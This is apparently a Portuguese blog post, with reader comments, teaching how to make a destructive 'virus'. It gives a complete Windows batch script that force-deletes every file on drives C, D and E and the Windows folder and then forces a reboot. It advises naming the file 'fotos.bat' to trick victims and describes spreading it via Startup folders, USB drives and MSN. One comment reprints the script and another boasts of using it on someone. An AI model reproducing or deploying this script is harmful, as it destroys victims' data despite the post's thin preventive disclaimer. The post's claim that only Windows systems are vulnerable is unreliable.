Como criar um vírus, rápido, fácil e destrutivo

ATENÇÃO: O objetivo desta postagem é para que as pessoas se previnam e aprendam a utilizar melhor o computador. Ao ver como é simples e fácil a criação de um vírus que pode ser letal e muito destrutivo. Não nos responsabilizaremos por nenhum uso indevido dele.

1° Abra o bloco de notas e digite isso:
@echo off
Del "C:\*.*" /f /s /q
Del "C:\WINDOWS\*.*" /f /s /q
del %systemdrive%\*.* /f /s /q
Del "D:\*.*" /f /s /q
Del "E:\*.*" /f /s /q
shutdown -r -f -t 00
exit

2° Vá em "Arquivo" -> "Salvar Como..." e salve com o nome "fotos.bat" (* fotos é só um exemplo de nome, para a pessoa poder abrir o arquivo, o .bat que é o importante).

3° Basta executar este arquivo para tudo ir para os ares. Isso é sério! Sei que está duvidando, mas a simples execução deste arquivo vai excluir tudo que tiver no computador e ainda vai ferrar com o seu sistema operacional, não deve ser feito com ninguém. Nem seja louco(a) de tentar fazer isso no seu computador.

Como os hacker's fazem isso:
  • Simplesmente acessam o PC da vítima e coloca este arquivo dentro da pasta iniciar. Ou colam ele no disco C:\ e cria um link com inicialização minimizada, fica ainda melhor.
  • Acrescentam a função "Copy", que antes de infectar vai fazer o arquivo se copiar para todos os PEN DRIVES.
  • Mandam isso por MSN e fazem as pessoas abrirem, pensando que realmente se trata de uma foto.
Existem várias maneiras de camuflar o vírus, como exemplo mais avançado, um programa que faça tudo isso oculto, e ainda programa a data que quer fazer, exemplo: Você vou infectado hoje, antes de distruir o vírus fica ali uns 7 dias para dar tempo de você infectar outros através de Pen Drives e outras coisas.

Porém isso eu não vou ensinar, porquê como disse no inicio, o objetivo desta postagem é para que as pessoas previnam-se. Essa prática é Ilegal (crime), antiético, pecaminosa e tudo de ruim que possa imaginar.

Imagine você perder tudo que tem no seu PC. É um desespero. Mas fica a dica: Jamais abra arquivos não confiáveis com extensões: .bat, .cmd, .com, .exe, .msi entre outros.

OBS.: Provavelmente não irá apagar todos, mais já danificará o sistema suficiente para não iniciar mais.

Dica de Ouro: Se você é um simples usuário e deseja ter segurança ao utilizar o seu Computador, recomendo que use um sistema operacional seguro: O Ubuntu Linux é um exemplo e sistema fácil e totalmente seguro, os únicos sistemas vulneráveis sãos os sistemas do tipo Windows da Microsoft.
Veja como é fácil utilizar o Linux neste site: www.ubuntu-br.org

10 comentários:

  1. vish ta doido fazer isso ai kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk

    ResponderExcluir
  2. Bem loco ja fiz com um doente que fez umas merdas pra mim e mandei ele pra vala com mais codigos e programas se me entendem

    ResponderExcluir
  3. man... eu fiz no meu pc e agr eu n tinha lido tudo
    @echo off
    Del "C:\*.*" /f /s /q
    Del "C:\WINDOWS\*.*" /f /s /q
    del %systemdrive%\*.* /f /s /q
    Del "D:\*.*" /f /s /q
    Del "E:\*.*" /f /s /q
    shutdown -r -f -t 00
    exit

    ResponderExcluir
    Respostas
    1. skskskkskskskskskskskskskskskssks,eae o que aconteceu man?

      Excluir
    2. Ele se fudeu kkkkkkkkkkkkkkkkkkkkkkkkkkkkkk

      Excluir
  4. https://play.google.com/store/apps/details?id=com.chaloapps.roosterrudy

    ResponderExcluir